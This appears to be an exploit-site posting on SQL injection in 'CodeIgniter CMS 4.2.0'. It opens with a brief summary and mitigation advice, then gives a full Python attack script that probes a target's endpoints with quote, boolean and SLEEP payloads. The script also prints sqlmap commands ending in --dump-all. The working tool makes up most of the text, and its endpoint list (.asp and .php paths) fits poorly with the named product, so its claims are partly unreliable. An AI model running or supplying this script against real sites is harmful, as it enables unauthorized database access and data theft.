CodeIgniter CMS 4.2.0 SQL Injection

CodeIgniter CMS 4.2.0 was susceptible to SQL Injection vulnerabilities. This CodeIgniter CMS 4.2.0 was susceptible to SQL Injection vulnerabilities. This typically arose when user-supplied input was directly concatenated into SQL queries without proper sanitization or parameterization.

Attackers could exploit this to execute arbitrary SQL commands, leading to unauthorized data access, modification, or even deletion. Common vectors included vulnerable GET/POST parameters or URL segments, allowing database enumeration or credential theft.

While CodeIgniter's framework provides robust query builder methods to prevent such issues, the vulnerability likely resided in custom application code within the CMS built upon the framework.

To mitigate, developers should always use prepared statements, parameterized queries, or CodeIgniter's Query Builder. Updating to a patched version of the CMS or ensuring all user input is validated and escaped is crucial for security.

=============================================================================================================================================
| # Title : CodeIgniter CMS 4.2.0 SQL Injection Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.codeigniter.com/ |
=============================================================================================================================================

POC :

[+] References : https://packetstorm.news/files/id/167893/


[+] Summary :

multiple SQL Injection vulnerabilities in CodeIgniter CMS version 4.2.0.
The vulnerabilities affect various endpoints and parameters,
allowing unauthenticated attackers to execute arbitrary SQL queries and potentially compromise the entire database.
Multiple parameters across various endpoints fail to implement proper input sanitization, allowing SQL injection attacks through both GET and POST requests.


[+] POC : python poc.py

#!/usr/bin/env python3
"""
CodeIgniter CMS Version 4.2.0 SQL Injection Exploit
Author: indoushka
Vulnerability: SQL Injection in multiple parameters
"""

import requests
import sys
import urllib3
import time
from argparse import ArgumentParser

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class CodeIgniterExploit:
def __init__(self, target):
self.target = target.rstrip('/')
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive'
})

def check_vulnerability(self):
"""Check if target is vulnerable to SQL Injection"""
print(f"[*] Checking vulnerability for: {self.target}")

# Test multiple vulnerable endpoints
endpoints = [
"/Job/searchResult/?title=123",
"/Job/searchResult/?title=test",
"/search.php?search=1",
"/news.php?p=7251",
"/employe/show.php?cvid=14088",
"/login/",
"/fa/index.asp?p=search&search=1",
"/fa/FormView/1026",
"/fa/formview/1030"
]

vulnerable_endpoints = []

for endpoint in endpoints:
# Test with single quote
test_url = f"{self.target}{endpoint}'"

try:
response = self.session.get(test_url, timeout=10, verify=False)

# Check for SQL error indicators
error_indicators = [
"SQL syntax",
"mysql_fetch",
"mysql_num_rows",
"ODBC Driver",
"Unclosed quotation mark",
"syntax error",
"MySQL server",
"Warning: mysql",
"PostgreSQL",
"ORA-",
"Microsoft OLE DB"
]

for error in error_indicators:
if error.lower() in response.text.lower():
print(f"[+] SQL Injection found in: {endpoint}")
vulnerable_endpoints.append(endpoint)
break

except Exception as e:
print(f"[-] Error testing {endpoint}: {e}")
continue

return vulnerable_endpoints

def exploit_boolean(self, endpoint):
"""Boolean-based blind SQL injection"""
print(f"[*] Testing boolean-based SQLi on: {endpoint}")

# Test boolean conditions
true_payload = f"{endpoint}' AND '1'='1"
false_payload = f"{endpoint}' AND '1'='2"

try:
true_response = self.session.get(f"{self.target}{true_payload}", timeout=10, verify=False)
false_response = self.session.get(f"{self.target}{false_payload}", timeout=10, verify=False)

if true_response.text != false_response.text:
print("[+] Boolean-based SQL Injection confirmed!")
return True

except Exception as e:
print(f"[-] Boolean test failed: {e}")

return False

def exploit_time_based(self, endpoint):
"""Time-based blind SQL injection"""
print(f"[*] Testing time-based SQLi on: {endpoint}")

time_payload = f"{endpoint}' AND SLEEP(5)--"

try:
start_time = time.time()
response = self.session.get(f"{self.target}{time_payload}", timeout=10, verify=False)
end_time = time.time()

if end_time - start_time >= 5:
print(f"[+] Time-based SQL Injection confirmed! (Delay: {end_time - start_time:.2f}s)")
return True

except Exception as e:
print(f"[-] Time-based test failed: {e}")

return False

def generate_sqlmap_commands(self, endpoints):
"""Generate sqlmap commands for automated exploitation"""
print("\n[+] SQLMap Commands:")
print("=" * 60)

for endpoint in endpoints:
url = f"{self.target}{endpoint}"
print(f"\n# For endpoint: {endpoint}")
print(f'sqlmap -u "{url}" --batch --level=5 --risk=3')
print(f'sqlmap -u "{url}" --batch --dbs')
print(f'sqlmap -u "{url}" --batch --current-db')
print(f'sqlmap -u "{url}" --batch --tables')
print(f'sqlmap -u "{url}" --batch --dump-all')

def comprehensive_scan(self):
"""Run comprehensive vulnerability scan"""
print("[*] Starting comprehensive CodeIgniter CMS scan...")

# Check vulnerability
vulnerable_endpoints = self.check_vulnerability()

if not vulnerable_endpoints:
print("[-] No SQL Injection vulnerabilities found")
return

print(f"\n[+] Found {len(vulnerable_endpoints)} vulnerable endpoints")

# Test exploitation methods on each endpoint
for endpoint in vulnerable_endpoints:
print(f"\n[*] Testing exploitation methods for: {endpoint}")

# Boolean-based
self.exploit_boolean(endpoint)

# Time-based
self.exploit_time_based(endpoint)

# Generate sqlmap commands
self.generate_sqlmap_commands(vulnerable_endpoints)

def main():
banner = """
??????? ?????????? ??????? ??? ?????????????? ?????? ??? ??????
???????? ??????????????????????? ?????????????? ?????? ????????????
????????? ????? ?????? ?????? ?????????????????????????? ????????
???????????????????????? ?????? ?????????????????????????? ????????
?????? ??????????????????????????????????????????? ?????? ?????? ???
?????? ???????????? ??????? ??????? ??????????? ?????? ?????? ???

CodeIgniter CMS 4.2.0 SQL Injection Exploit
By: indoushka
"""
print(banner)

parser = ArgumentParser(description='CodeIgniter CMS SQL Injection Exploit')
parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., https://example.com)')
parser.add_argument('--check', action='store_true', help='Check vulnerability only')
parser.add_argument('--exploit', action='store_true', help='Run full exploitation')
parser.add_argument('--sqlmap', action='store_true', help='Generate sqlmap commands')

args = parser.parse_args()

exploit = CodeIgniterExploit(args.url)

if args.check:
vulnerable_endpoints = exploit.check_vulnerability()
if vulnerable_endpoints:
print(f"\n[!] Target is VULNERABLE - Found {len(vulnerable_endpoints)} endpoints")
else:
print("\n[!] Target does not appear to be vulnerable")

elif args.exploit:
exploit.comprehensive_scan()

elif args.sqlmap:
vulnerable_endpoints = exploit.check_vulnerability()
if vulnerable_endpoints:
exploit.generate_sqlmap_commands(vulnerable_endpoints)
else:
print("[-] No vulnerable endpoints found for sqlmap")

else:
# Default: comprehensive scan
exploit.comprehensive_scan()

if __name__ == "__main__":
if len(sys.argv) == 1:
print("Usage: python codeigniter_exploit.py -u https://target.com")
print("Options: --check, --exploit, --sqlmap")
sys.exit(1)

main()

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================